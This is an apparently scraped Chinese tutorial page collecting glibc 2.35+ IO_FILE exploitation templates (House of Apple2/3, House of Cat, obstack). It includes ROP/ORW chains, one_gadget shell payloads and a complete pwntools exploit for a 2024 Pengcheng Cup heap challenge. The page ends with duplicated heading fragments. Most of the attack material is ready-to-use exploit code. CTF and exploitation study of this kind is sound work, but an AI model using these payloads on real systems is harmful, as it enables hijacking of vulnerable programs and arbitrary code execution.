libc2.35时代IO利用模板总结<\/h1>

概述<\/h2>
本文详细总结了libc2.35及更高版本中的IO利用技术，主要包括house of apple系列、house of cat和obstack利用等方法。这些技术通过伪造IO_FILE结构体，利用IO操作中的函数调用链实现控制流劫持。<\/p>

前置条件<\/h2>
大多数IO利用技术需要满足以下条件：<\/p>
已知heap地址和libc基址<\/li>
能控制程序执行IO操作（如从main返回、调用exit、触发__malloc_assert等）<\/li>
能控制vtable和相关结构体（通常通过largebin attack实现）<\/li> <\/ol>
House of Apple系列<\/h2>

House of Apple2<\/h3>
利用点<\/strong>：基于IO_FILE->_wide_data的利用<\/p>
调用链<\/strong>：<\/p>
_IO_wfile_overflow -> _IO_wdoallocbuf -> _IO_WDOALLOCATE
<\/code><\/pre>
getshell模板<\/h4>
def<\/span> house_of_apple2<\/span>(fake_IO_file_addr):
<\/span><\/span>    fake_IO_file =<\/span> flat({
<\/span><\/span>        0x18<\/span>: 1<\/span>,               # _IO_write_ptr<\/span>
<\/span><\/span>        0x58<\/span>: one_gadget,      # chain<\/span>
<\/span><\/span>        0x78<\/span>: _IO_stdfile_2_lock, # _lock<\/span>
<\/span><\/span>        0x90<\/span>: fake_IO_file_addr, # _IO_wide_data<\/span>
<\/span><\/span>        0xc8<\/span>: _IO_wfile_jumps, # vtable<\/span>
<\/span><\/span>        0xd0<\/span>: fake_IO_file_addr  # fake wide vtable<\/span>
<\/span><\/span>    }, filler=<\/span>'<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>    return<\/span> fake_IO_file
<\/span><\/span><\/code><\/pre>ORW模板<\/h4>
def<\/span> house_of_apple2<\/span>(fake_IO_file_addr):
<\/span><\/span>    fake_IO_file =<\/span> flat({
<\/span><\/span>        0x18<\/span>: 1<\/span>,               # _IO_write_ptr<\/span>
<\/span><\/span>        0x58<\/span>: setcontext +<\/span> 61<\/span>, # chain<\/span>
<\/span><\/span>        0x78<\/span>: _IO_stdfile_2_lock, # _lock<\/span>
<\/span><\/span>        0x90<\/span>: fake_IO_file_addr +<\/span> 0x100<\/span>, # _IO_wide_data<\/span>
<\/span><\/span>        0xc8<\/span>: _IO_wfile_jumps, # vtable<\/span>
<\/span><\/span>        0xf0<\/span>: {
<\/span><\/span>            0xa0<\/span>: [fake_IO_file_addr +<\/span> 0x200<\/span>, ret],
<\/span><\/span>            0xe0<\/span>: fake_IO_file_addr
<\/span><\/span>        },
<\/span><\/span>        0x1f0<\/span>: [
<\/span><\/span>            pop_rdi_ret, fake_IO_file_addr >><\/span> 12<\/span> <<<\/span> 12<\/span>,
<\/span><\/span>            pop_rsi_ret, 0x2000<\/span>,
<\/span><\/span>            pop_rdx_rbx_ret, 7<\/span>, 0<\/span>,
<\/span><\/span>            pop_rax_ret, 10<\/span>,  # mprotect<\/span>
<\/span><\/span>            syscall_ret, fake_IO_file_addr +<\/span> 0x290<\/span>
<\/span><\/span>        ],
<\/span><\/span>        0x280<\/span>: asm(shellcraft.<\/span>cat('flag'<\/span>))
<\/span><\/span>    }, filler=<\/span>'<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>    return<\/span> fake_IO_file
<\/span><\/span><\/code><\/pre>House of Apple3<\/h3>
利用点<\/strong>：基于IO_FILE->_codecvt的利用<\/p>
调用链<\/strong>：<\/p>
_IO_wfile_underflow -> libio_codecvt_in -> fp->codecvt -> cd_in.step -> __fct(函数指针)
<\/code><\/pre>
getshell模板<\/h4>
def<\/span> house_of_apple3<\/span>(fake_IO_file_addr):
<\/span><\/span>    fake_ucontext =<\/span> ucontext_t()
<\/span><\/span>    fake_ucontext.<\/span>rip =<\/span> ret
<\/span><\/span>    fake_ucontext.<\/span>rsp =<\/span> fake_IO_file_addr +<\/span> 0x300<\/span>
<\/span><\/span>    fake_ucontext.<\/span>rdi =<\/span> fake_IO_file_addr >><\/span> 12<\/span> <<<\/span> 12<\/span>
<\/span><\/span>    fake_ucontext.<\/span>rsi =<\/span> 0x2000<\/span>
<\/span><\/span>    fake_ucontext.<\/span>rdx =<\/span> 7<\/span>
<\/span><\/span>    
<\/span><\/span>    fake_IO_file =<\/span> flat({
<\/span><\/span>        0<\/span>: 0xffffffffffffffff<\/span>,  # _IO_read_end<\/span>
<\/span><\/span>        0x18<\/span>: 1<\/span>,                # _IO_write_ptr<\/span>
<\/span><\/span>        0x30<\/span>: fake_IO_file_addr +<\/span> 0x100<\/span>,  # _IO_buf_end = _codecvt.step<\/span>
<\/span><\/span>        0x88<\/span>: fake_IO_file_addr +<\/span> 0x40<\/span>,   # _codecvt<\/span>
<\/span><\/span>        0x90<\/span>: _IO_wide_data,
<\/span><\/span>        0xc8<\/span>: _IO_wfile_jumps +<\/span> 0x8<\/span>,      # vtable<\/span>
<\/span><\/span>        0xf0<\/span>: {
<\/span><\/span>            0<\/span>: 0<\/span>,               # key<\/span>
<\/span><\/span>            0x28<\/span>: one_gadget    # fun_ptr<\/span>
<\/span><\/span>        }
<\/span><\/span>    }, filler=<\/span>'<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>    return<\/span> fake_IO_file
<\/span><\/span><\/code><\/pre>ORW模板<\/h4>
def<\/span> house_of_apple3<\/span>(fake_IO_file_addr):
<\/span><\/span>    frame =<\/span> SigreturnFrame()
<\/span><\/span>    frame.<\/span>rip =<\/span> ret
<\/span><\/span>    frame.<\/span>rsp =<\/span> fake_IO_file_addr +<\/span> 0x200<\/span>
<\/span><\/span>    frame.<\/span>rdi =<\/span> fake_IO_file_addr >><\/span> 12<\/span> <<<\/span> 12<\/span>
<\/span><\/span>    frame.<\/span>rsi =<\/span> 0x2000<\/span>
<\/span><\/span>    frame.<\/span>rdx =<\/span> 7<\/span>
<\/span><\/span>    
<\/span><\/span>    fake_IO_file =<\/span> flat({
<\/span><\/span>        0<\/span>: 0xffffffffffffffff<\/span>,  # _IO_read_end<\/span>
<\/span><\/span>        0x18<\/span>: 1<\/span>,                # _IO_write_ptr<\/span>
<\/span><\/span>        0x30<\/span>: fake_IO_file_addr +<\/span> 0x100<\/span>,  # _IO_buf_end = _codecvt.step<\/span>
<\/span><\/span>        0x88<\/span>: fake_IO_file_addr +<\/span> 0x40<\/span>,   # _codecvt<\/span>
<\/span><\/span>        0x90<\/span>: _IO_wide_data,
<\/span><\/span>        0xc8<\/span>: _IO_wfile_jumps +<\/span> 0x8<\/span>,      # vtable<\/span>
<\/span><\/span>        0xf0<\/span>: {
<\/span><\/span>            0<\/span>: 0<\/span>,               # key<\/span>
<\/span><\/span>            0x8<\/span>: fake_IO_file_addr +<\/span> 0x100<\/span>,
<\/span><\/span>            0x20<\/span>: setcontext +<\/span> 61<\/span>,
<\/span><\/span>            0x28<\/span>: magic_gadget, # fun_ptr<\/span>
<\/span><\/span>            0x30<\/span>: bytes(frame)[0x30<\/span>:]
<\/span><\/span>        },
<\/span><\/span>        0x1f0<\/span>: [
<\/span><\/span>            pop_rax_ret, 10<\/span>,
<\/span><\/span>            syscall_ret, fake_IO_file_addr +<\/span> 0x230<\/span>
<\/span><\/span>        ],
<\/span><\/span>        0x220<\/span>: asm(shellcraft.<\/span>cat('flag'<\/span>))
<\/span><\/span>    }, filler=<\/span>'<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>    return<\/span> fake_IO_file
<\/span><\/span><\/code><\/pre>House of Cat<\/h2>
利用点<\/strong>：利用_IO_wide_data结构体，通过不同的调用链实现利用<\/p>
调用链<\/strong>：<\/p>
_IO_wfile_seekoff -> _IO_switch_to_wget_mode
<\/code><\/pre>
getshell模板<\/h3>
def<\/span> house_of_cat<\/span>(fake_IO_file_addr):
<\/span><\/span>    fake_IO_file =<\/span> flat({
<\/span><\/span>        0x20<\/span>: [0<\/span>, 0<\/span>, 1<\/span>, 1<\/span>, fake_IO_file_addr],  # rdx system<\/span>
<\/span><\/span>        0x58<\/span>: 0<\/span>,               # chain<\/span>
<\/span><\/span>        0x78<\/span>: _IO_stdfile_2_lock, # _lock<\/span>
<\/span><\/span>        0x90<\/span>: fake_IO_file_addr +<\/span> 0x30<\/span>, # _IO_wide_data<\/span>
<\/span><\/span>        0xb0<\/span>: 1<\/span>,               # _mode<\/span>
<\/span><\/span>        0xc8<\/span>: _IO_wfile_jumps +<\/span> 0x30<\/span>, # vtable _IO_wfile_seekoff<\/span>
<\/span><\/span>        0x100<\/span>: fake_IO_file_addr +<\/span> 0x40<\/span> # fake_wide_jumps<\/span>
<\/span><\/span>    })
<\/span><\/span>    return<\/span> fake_IO_file
<\/span><\/span><\/code><\/pre>ORW模板（ROP链方式）<\/h3>
def<\/span> house_of_cat<\/span>(fake_IO_file_addr):
<\/span><\/span>    flag_addr =<\/span> fake_IO_file_addr +<\/span> 0x200<\/span>
<\/span><\/span>    data =<\/span> fake_IO_file_addr +<\/span> 0x400<\/span>
<\/span><\/span>    payload =<\/span> flat({
<\/span><\/span>        0x20<\/span>: [0<\/span>, 0<\/span>, 1<\/span>, 1<\/span>, fake_IO_file_addr+<\/span>0x150<\/span>],  # rdx setcontext + 61<\/span>
<\/span><\/span>        0x58<\/span>: 0<\/span>,               # chain<\/span>
<\/span><\/span>        0x78<\/span>: _IO_stdfile_2_lock, # _lock<\/span>
<\/span><\/span>        0x90<\/span>: fake_IO_file_addr +<\/span> 0x30<\/span>, # _IO_wide_data<\/span>
<\/span><\/span>        0xb0<\/span>: 1<\/span>,               # _mode<\/span>
<\/span><\/span>        0xc8<\/span>: _IO_wfile_jumps +<\/span> 0x10<\/span>, # fake_IO_wide_jumps<\/span>
<\/span><\/span>        0x100<\/span>: fake_IO_file_addr +<\/span> 0x40<\/span>,
<\/span><\/span>        0x140<\/span>: {0xa0<\/span>: [fake_IO_file_addr +<\/span> 0x210<\/span>, ret]},
<\/span><\/span>        0x1f0<\/span>: 'flag'<\/span>,
<\/span><\/span>        0x200<\/span>: [
<\/span><\/span>            pop_rax_ret,        # sys_open('flag', 0)<\/span>
<\/span><\/span>            2<\/span>,
<\/span><\/span>            pop_rdi_ret, flag_addr,
<\/span><\/span>            pop_rsi_ret, 0<\/span>,
<\/span><\/span>            syscall_ret,
<\/span><\/span>            pop_rax_ret,        # sys_read(flag_fd, heap, 0x100)<\/span>
<\/span><\/span>            0<\/span>,
<\/span><\/span>            pop_rdi_ret, 3<\/span>,
<\/span><\/span>            pop_rsi_ret, data,
<\/span><\/span>            pop_rdx_rbx_ret, 0x40<\/span>, 0<\/span>,
<\/span><\/span>            syscall_ret,
<\/span><\/span>            pop_rax_ret,        # sys_write(1, heap, 0x100)<\/span>
<\/span><\/span>            1<\/span>,
<\/span><\/span>            pop_rdi_ret, 1<\/span>,
<\/span><\/span>            pop_rsi_ret, data,
<\/span><\/span>            pop_rdx_rbx_ret, 0x40<\/span>, 0<\/span>,
<\/span><\/span>            syscall_ret
<\/span><\/span>        ]
<\/span><\/span>    }, filler=<\/span>'<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>    return<\/span> payload
<\/span><\/span><\/code><\/pre>Obstrack利用<\/h2>
利用点<\/strong>：利用obstack结构体实现控制流劫持<\/p>
调用链<\/strong>：<\/p>
_IO_obstack_xsputn -> _obstack_newchunk -> CALL_CHUNKFUN -> chunkfun
<\/code><\/pre>
getshell模板<\/h3>
def<\/span> house_of_obstack<\/span>(fake_IO_file_addr):
<\/span><\/span>    fake_IO_file =<\/span> flat({
<\/span><\/span>        0x8<\/span>: 1<\/span>,                # next_free<\/span>
<\/span><\/span>        0x10<\/span>: 0<\/span>,               # chunk_limit<\/span>
<\/span><\/span>        0x18<\/span>: 1<\/span>,               # _IO_write_ptr<\/span>
<\/span><\/span>        0x20<\/span>: 0<\/span>,               # _IO_write_end<\/span>
<\/span><\/span>        0x28<\/span>: system,          # gadget<\/span>
<\/span><\/span>        0x38<\/span>: fake_IO_file_addr +<\/span> 0xe8<\/span>,  # rdi = &'\/bin\/sh\x00'<\/span>
<\/span><\/span>        0x40<\/span>: 1<\/span>,
<\/span><\/span>        0x58<\/span>: 0<\/span>,               # chain<\/span>
<\/span><\/span>        0x78<\/span>: _IO_stdfile_2_lock, # _IO_stdfile_1_lock<\/span>
<\/span><\/span>        0x90<\/span>: _IO_wide_data,   # _IO_wide_data_2<\/span>
<\/span><\/span>        0xc8<\/span>: _IO_obstack_jumps +<\/span> 0x20<\/span>,
<\/span><\/span>        0xd0<\/span>: fake_IO_file_addr, # obstack(B)<\/span>
<\/span><\/span>        0xd8<\/span>: '\/bin\/sh<\/span>\x00<\/span>'<\/span>
<\/span><\/span>    }, filler=<\/span>'<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>    return<\/span> fake_IO_file
<\/span><\/span><\/code><\/pre>ORW模板<\/h3>
def<\/span> house_of_obstack<\/span>(fake_IO_file_addr):
<\/span><\/span>    flag_addr =<\/span> fake_IO_file_addr +<\/span> 0x300<\/span>
<\/span><\/span>    data =<\/span> fake_IO_file_addr +<\/span> 0x380<\/span>
<\/span><\/span>    fake_IO_file =<\/span> flat({
<\/span><\/span>        0<\/span>: {
<\/span><\/span>            0x8<\/span>: 1<\/span>,            # next_free<\/span>
<\/span><\/span>            0x10<\/span>: 0<\/span>,           # chunk_limit<\/span>
<\/span><\/span>            0x18<\/span>: 1<\/span>,           # _IO_write_ptr<\/span>
<\/span><\/span>            0x20<\/span>: 0<\/span>,           # _IO_write_end<\/span>
<\/span><\/span>            0x28<\/span>: magic_gadget, # gadget<\/span>
<\/span><\/span>            0x38<\/span>: fake_IO_file_addr +<\/span> 0x100<\/span>, # rdi<\/span>
<\/span><\/span>            0x40<\/span>: 1<\/span>,
<\/span><\/span>            0x58<\/span>: 0<\/span>,           # chain<\/span>
<\/span><\/span>            0x78<\/span>: _IO_stdfile_2_lock, # _IO_stdfile_1_lock<\/span>
<\/span><\/span>            0x90<\/span>: _IO_wide_data, # _IO_wide_data_2<\/span>
<\/span><\/span>            0xc8<\/span>: _IO_obstack_jumps +<\/span> 0x20<\/span>,
<\/span><\/span>            0xd0<\/span>: fake_IO_file_addr # obstack(B)<\/span>
<\/span><\/span>        },
<\/span><\/span>        0xf0<\/span>: {
<\/span><\/span>            0<\/span>: [0<\/span>, fake_IO_file_addr +<\/span> 0x100<\/span>, 0<\/span>, 0<\/span>, setcontext +<\/span> 61<\/span>],
<\/span><\/span>            0xa0<\/span>: fake_IO_file_addr +<\/span> 0x200<\/span>,
<\/span><\/span>            0xa8<\/span>: ret
<\/span><\/span>        },
<\/span><\/span>        0x1f0<\/span>: [
<\/span><\/span>            pop_rax_ret,        # sys_open('flag', 0)<\/span>
<\/span><\/span>            2<\/span>,
<\/span><\/span>            pop_rdi_ret, flag_addr,
<\/span><\/span>            pop_rsi_ret, 0<\/span>,
<\/span><\/span>            syscall_ret,
<\/span><\/span>            pop_rax_ret,        # sys_read(flag_fd, heap, 0x100)<\/span>
<\/span><\/span>            0<\/span>,
<\/span><\/span>            pop_rdi_ret, 3<\/span>,
<\/span><\/span>            pop_rsi_ret, data,
<\/span><\/span>            pop_rdx_rbx_ret, 0x40<\/span>, 0<\/span>,
<\/span><\/span>            syscall_ret,
<\/span><\/span>            pop_rax_ret,        # sys_write(1, heap, 0x100)<\/span>
<\/span><\/span>            1<\/span>,
<\/span><\/span>            pop_rdi_ret, 1<\/span>,
<\/span><\/span>            pop_rsi_ret, data,
<\/span><\/span>            pop_rdx_rbx_ret, 0x40<\/span>, 0<\/span>,
<\/span><\/span>            syscall_ret
<\/span><\/span>        ],
<\/span><\/span>        0x2f0<\/span>: 'flag<\/span>\x00\x00\x00\x00<\/span>'<\/span>
<\/span><\/span>    }, filler=<\/span>'<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>    return<\/span> fake_IO_file
<\/span><\/span><\/code><\/pre>关键结构体<\/h2>
ucontext_t结构体<\/h3>
class<\/span> ucontext_t<\/span>:
<\/span><\/span>    '''[0x1c0] must be NULL.'''<\/span>
<\/span><\/span>    length =<\/span> 0x1c8<\/span>
<\/span><\/span>    bin_str =<\/span> length *<\/span> b<\/span>'<\/span>\0<\/span>'<\/span>
<\/span><\/span>    rip =<\/span> 0<\/span>
<\/span><\/span>    rsp =<\/span> 0<\/span>
<\/span><\/span>    rbx =<\/span> 0<\/span>
<\/span><\/span>    rbp =<\/span> 0<\/span>
<\/span><\/span>    r12 =<\/span> 0<\/span>
<\/span><\/span>    r13 =<\/span> 0<\/span>
<\/span><\/span>    r14 =<\/span> 0<\/span>
<\/span><\/span>    r15 =<\/span> 0<\/span>
<\/span><\/span>    rsi =<\/span> 0<\/span>
<\/span><\/span>    rdi =<\/span> 0<\/span>
<\/span><\/span>    rcx =<\/span> 0<\/span>
<\/span><\/span>    r8 =<\/span> 0<\/span>
<\/span><\/span>    r9 =<\/span> 0<\/span>
<\/span><\/span>    rdx =<\/span> 0<\/span>
<\/span><\/span>    
<\/span><\/span>    def<\/span> __init__(self):
<\/span><\/span>        pass<\/span>
<\/span><\/span>    
<\/span><\/span>    def<\/span> set_value<\/span>(self, offset, value):
<\/span><\/span>        if<\/span> (offset <=<\/span> 0<\/span> or<\/span> offset ><\/span> self.<\/span>length -<\/span> 8<\/span>):
<\/span><\/span>            raise<\/span> Exception<\/span>("Out bound!"<\/span>)
<\/span><\/span>        temp =<\/span> self.<\/span>bin_str
<\/span><\/span>        temp =<\/span> temp[:offset] +<\/span> struct.<\/span>pack('Q'<\/span>, value) +<\/span> temp[offset+<\/span>8<\/span>:]
<\/span><\/span>        self.<\/span>bin_str =<\/span> temp
<\/span><\/span>    
<\/span><\/span>    def<\/span> __bytes__(self):
<\/span><\/span>        self.<\/span>set_value(0x28<\/span>, self.<\/span>r8)
<\/span><\/span>        self.<\/span>set_value(0x30<\/span>, self.<\/span>r9)
<\/span><\/span>        self.<\/span>set_value(0x48<\/span>, self.<\/span>r12)
<\/span><\/span>        self.<\/span>set_value(0x50<\/span>, self.<\/span>r13)
<\/span><\/span>        self.<\/span>set_value(0x58<\/span>, self.<\/span>r14)
<\/span><\/span>        self.<\/span>set_value(0x60<\/span>, self.<\/span>r15)
<\/span><\/span>        self.<\/span>set_value(0x68<\/span>, self.<\/span>rdi)
<\/span><\/span>        self.<\/span>set_value(0x70<\/span>, self.<\/span>rsi)
<\/span><\/span>        self.<\/span>set_value(0x78<\/span>, self.<\/span>rbp)
<\/span><\/span>        self.<\/span>set_value(0x80<\/span>, self.<\/span>rbx)
<\/span><\/span>        self.<\/span>set_value(0x88<\/span>, self.<\/span>rdx)
<\/span><\/span>        self.<\/span>set_value(0x98<\/span>, self.<\/span>rcx)
<\/span><\/span>        self.<\/span>set_value(0xa0<\/span>, self.<\/span>rsp)
<\/span><\/span>        self.<\/span>set_value(0xa8<\/span>, self.<\/span>rip)  # rip<\/span>
<\/span><\/span>        self.<\/span>set_value(0xe0<\/span>, self.<\/span>rip)  # readable<\/span>
<\/span><\/span>        return<\/span> self.<\/span>bin_str
<\/span><\/span><\/code><\/pre>obstack相关结构体<\/h3>
struct<\/span> _IO_obstack_file {
<\/span><\/span>    struct<\/span> _IO_FILE_plus file;
<\/span><\/span>    struct<\/span> obstack *<\/span>obstack;  \/\/ 0xe0
<\/span><\/span><\/span><\/span>};
<\/span><\/span>
<\/span><\/span>struct<\/span> obstack {
<\/span><\/span>    long<\/span> chunk_size;
<\/span><\/span>    struct<\/span> _obstack_chunk *<\/span>chunk;
<\/span><\/span>    char<\/span> *<\/span>object_base;
<\/span><\/span>    char<\/span> *<\/span>next_free;        \/\/ offset = 0x18
<\/span><\/span><\/span><\/span>    char<\/span> *<\/span>chunk_limit;      \/\/ offset = 0x20
<\/span><\/span><\/span><\/span>    union<\/span> {
<\/span><\/span>        long<\/span> tempint;
<\/span><\/span>        void<\/span> *<\/span>tempptr;
<\/span><\/span>    } temp;
<\/span><\/span>    int<\/span> alignment_mask;
<\/span><\/span>    struct<\/span> _obstack_chunk *<\/span>(*<\/span>chunkfun)(void<\/span> *<\/span>, long<\/span>);  \/\/ offset = 0x38
<\/span><\/span><\/span><\/span>    void<\/span> (*<\/span>freefun)(void<\/span> *<\/span>, struct<\/span> _obstack_chunk *<\/span>);
<\/span><\/span>    void<\/span> *<\/span>extra_arg;        \/\/ offset = 0x48
<\/span><\/span><\/span><\/span>    unsigned<\/span> int<\/span> use_extra_arg : 1<\/span>;  \/\/ offset = 0x50
<\/span><\/span><\/span><\/span>    unsigned<\/span> int<\/span> maybe_empty_object : 1<\/span>;
<\/span><\/span>    unsigned<\/span> int<\/span> alloc_failed : 1<\/span>;
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>struct<\/span> _obstack_chunk {
<\/span><\/span>    char<\/span> *<\/span>limit;
<\/span><\/span>    struct<\/span> _obstack_chunk *<\/span>prev;
<\/span><\/span>    char<\/span> contents[4<\/span>];
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>例题分析：2024鹏城杯 babyheap<\/h2>

edit函数存在堆溢出漏洞<\/li>
通过堆风水泄露heap地址和libc地址<\/li>
劫持_IO_list_all，使用house of apple2的getshell模板<\/li>
<\/ol>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>import<\/span> warnings
<\/span><\/span>warnings.<\/span>filterwarnings("ignore"<\/span>, category=<\/span>BytesWarning<\/span>)
<\/span><\/span>context.<\/span>arch =<\/span> 'amd64'<\/span>
<\/span><\/span>context.<\/span>log_level =<\/span> 'debug'<\/span>
<\/span><\/span>
<\/span><\/span>fn =<\/span> '.\/pwn'<\/span>
<\/span><\/span>elf =<\/span> ELF(fn)
<\/span><\/span>libc =<\/span> elf.<\/span>libc
<\/span><\/span>
<\/span><\/span>debug =<\/span> 1<\/span>
<\/span><\/span>if<\/span> debug:
<\/span><\/span>    p =<\/span> process(fn)
<\/span><\/span>else<\/span>:
<\/span><\/span>    p =<\/span> remote()
<\/span><\/span>
<\/span><\/span>def<\/span> dbg<\/span>(s=<\/span>''<\/span>):
<\/span><\/span>    if<\/span> debug:
<\/span><\/span>        gdb.<\/span>attach(p, s)
<\/span><\/span>        pause()
<\/span><\/span>    else<\/span>:
<\/span><\/span>        pass<\/span>
<\/span><\/span>
<\/span><\/span>lg =<\/span> lambda<\/span> x, y: log.<\/span>success(f<\/span>'<\/span>{<\/span>x}<\/span>: <\/span>{<\/span>hex(y)}<\/span>'<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> menu<\/span>(index):
<\/span><\/span>    p.<\/span>sendlineafter('your choice:'<\/span>, str(index))
<\/span><\/span>
<\/span><\/span>def<\/span> add<\/span>(index, size, content):
<\/span><\/span>    menu(1<\/span>)
<\/span><\/span>    p.<\/span>sendlineafter('input idx:'<\/span>, str(index))
<\/span><\/span>    p.<\/span>sendlineafter('input size:'<\/span>, str(size))
<\/span><\/span>    p.<\/span>sendafter('input content:'<\/span>, content)
<\/span><\/span>
<\/span><\/span>def<\/span> show<\/span>(index):
<\/span><\/span>    menu(3<\/span>)
<\/span><\/span>    p.<\/span>sendlineafter('input idx:'<\/span>, str(index))
<\/span><\/span>
<\/span><\/span>def<\/span> edit<\/span>(index, content):
<\/span><\/span>    menu(4<\/span>)
<\/span><\/span>    p.<\/span>sendlineafter('input idx:'<\/span>, str(index))
<\/span><\/span>    p.<\/span>send(content)
<\/span><\/span>
<\/span><\/span>def<\/span> delete<\/span>(index):
<\/span><\/span>    menu(2<\/span>)
<\/span><\/span>    p.<\/span>sendlineafter('input idx:'<\/span>, str(index))
<\/span><\/span>
<\/span><\/span># 泄露heap地址<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(12<\/span>):
<\/span><\/span>    add(i, 0x80<\/span>, 'aaaa'<\/span>)
<\/span><\/span>for<\/span> i in<\/span> range(7<\/span>):
<\/span><\/span>    delete(i)
<\/span><\/span>delete(7<\/span>)
<\/span><\/span>delete(9<\/span>)
<\/span><\/span>add(0x14<\/span>, 0x400<\/span>, 'aaaa'<\/span>)
<\/span><\/span>for<\/span> i in<\/span> range(7<\/span>):
<\/span><\/span>    add(0<\/span>, 0x80<\/span>, 'aaaa'<\/span>)
<\/span><\/span>add(7<\/span>, 0x80<\/span>, 'aaaaaaaa'<\/span>)
<\/span><\/span>show(7<\/span>)
<\/span><\/span>p.<\/span>recvuntil('a'<\/span>*<\/span>8<\/span>)
<\/span><\/span>heapbase =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>)) -<\/span> 0x7a0<\/span>
<\/span><\/span>lg('heapbase'<\/span>, heapbase)
<\/span><\/span>
<\/span><\/span># 泄露libc地址<\/span>
<\/span><\/span>add(0<\/span>, 0x80<\/span>, 'aaaa'<\/span>)
<\/span><\/span>for<\/span> i in<\/span> range(10<\/span>):
<\/span><\/span>    add(i, 0x80<\/span>, 'aaaa'<\/span>)
<\/span><\/span>for<\/span> i in<\/span> range(7<\/span>):
<\/span><\/span>    delete(i)
<\/span><\/span>delete(7<\/span>)
<\/span><\/span>add(0x14<\/span>, 0x400<\/span>, 'aaaa'<\/span>)
<\/span><\/span>for<\/span> i in<\/span> range(7<\/span>):
<\/span><\/span>    add(0<\/span>, 0x80<\/span>, 'aaaa'<\/span>)
<\/span><\/span>add(7<\/span>, 0x80<\/span>, 'aaaaaaaa'<\/span>)
<\/span><\/span>show(7<\/span>)
<\/span><\/span>p.<\/span>recvuntil('a'<\/span>*<\/span>8<\/span>)
<\/span><\/span>libcbase =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>)) -<\/span> 0x21ad60<\/span>
<\/span><\/span>lg('libcbase'<\/span>, libcbase)
<\/span><\/span>
<\/span><\/span># house of apple2利用<\/span>
<\/span><\/span>_IO_list_all =<\/span> libcbase +<\/span> libc.<\/span>sym['_IO_list_all'<\/span>]
<\/span><\/span>_IO_wfile_jumps =<\/span> libcbase +<\/span> 0x2170c0<\/span>
<\/span><\/span>_IO_stdfile_2_lock =<\/span> libcbase +<\/span> 0x21ca80<\/span>
<\/span><\/span>gadgets =<\/span> [0xebc81<\/span>, 0xebc85<\/span>, 0xebc88<\/span>, 0xebce2<\/span>, 0xebd3f<\/span>, 0xebd43<\/span>]
<\/span><\/span>one_gadget =<\/span> libcbase +<\/span> gadgets[0<\/span>]
<\/span><\/span>
<\/span><\/span>add(0<\/span>, 0x80<\/span>, 'aaaa'<\/span>)
<\/span><\/span>add(1<\/span>, 0x80<\/span>, 'aaaa'<\/span>)
<\/span><\/span>add(2<\/span>, 0x80<\/span>, 'aaaa'<\/span>)
<\/span><\/span>add(3<\/span>, 0x80<\/span>, 'aaaa'<\/span>)
<\/span><\/span>delete(2<\/span>)
<\/span><\/span>delete(1<\/span>)
<\/span><\/span>
<\/span><\/span># largebin attack劫持_IO_list_all<\/span>
<\/span><\/span>payload =<\/span> flat({
<\/span><\/span>    0x80<\/span>: [0<\/span>, 0x91<\/span>, _IO_list_all ^<\/span> ((heapbase +<\/span> 0x1000<\/span>) >><\/span> 12<\/span>)]
<\/span><\/span>})
<\/span><\/span>edit(0<\/span>, payload)
<\/span><\/span>
<\/span><\/span>fake_IO_file_addr =<\/span> heapbase +<\/span> 0x1950<\/span>
<\/span><\/span>add(0x14<\/span>, 0x400<\/span>, house_of_apple2(fake_IO_file_addr))
<\/span><\/span>add(0<\/span>, 0x80<\/span>, 'aaaa'<\/span>)
<\/span><\/span>add(1<\/span>, 0x80<\/span>, p64(fake_IO_file_addr))
<\/span><\/span>
<\/span><\/span># 触发IO流<\/span>
<\/span><\/span>menu(1<\/span>)
<\/span><\/span>p.<\/span>sendlineafter('input idx:'<\/span>, str(0x100<\/span>))
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>总结<\/h2>
本文详细总结了libc2.35及更高版本中的IO利用技术，包括：<\/p>

House of Apple系列（2和3版本）<\/li>
House of Cat<\/li>
Obstrack利用<\/li>
<\/ol>
这些技术通过伪造IO_FILE结构体，利用不同的调用链实现控制流劫持，可以用于getshell或ORW操作。关键点包括：<\/p>

需要heap和libc地址泄露<\/li>
通常需要largebin attack等堆利用技术<\/li>
需要触发IO操作（如exit、malloc_assert等）<\/li>
需要精心构造伪造的IO_FILE结构体<\/li>
<\/ul>
掌握这些技术可以有效地在高版本libc环境下实现利用。<\/p>
libc2.35时代IO利用模板总结<\/h1>

概述<\/h2> 本文详细总结了libc2.35及更高版本中的IO利用技术，主要包括house of apple系列、house of cat和obstack利用等方法。这些技术通过伪造IO_FILE结构体，利用IO操作中的函数调用链实现控制流劫持。<\/p>

House of Apple系列<\/h2>

关键结构体<\/h2>

概述<\/h2>
本文详细总结了libc2.35及更高版本中的IO利用技术，主要包括house of apple系列、house of cat和obstack利用等方法。这些技术通过伪造IO_FILE结构体，利用IO操作中的函数调用链实现控制流劫持。<\/p>
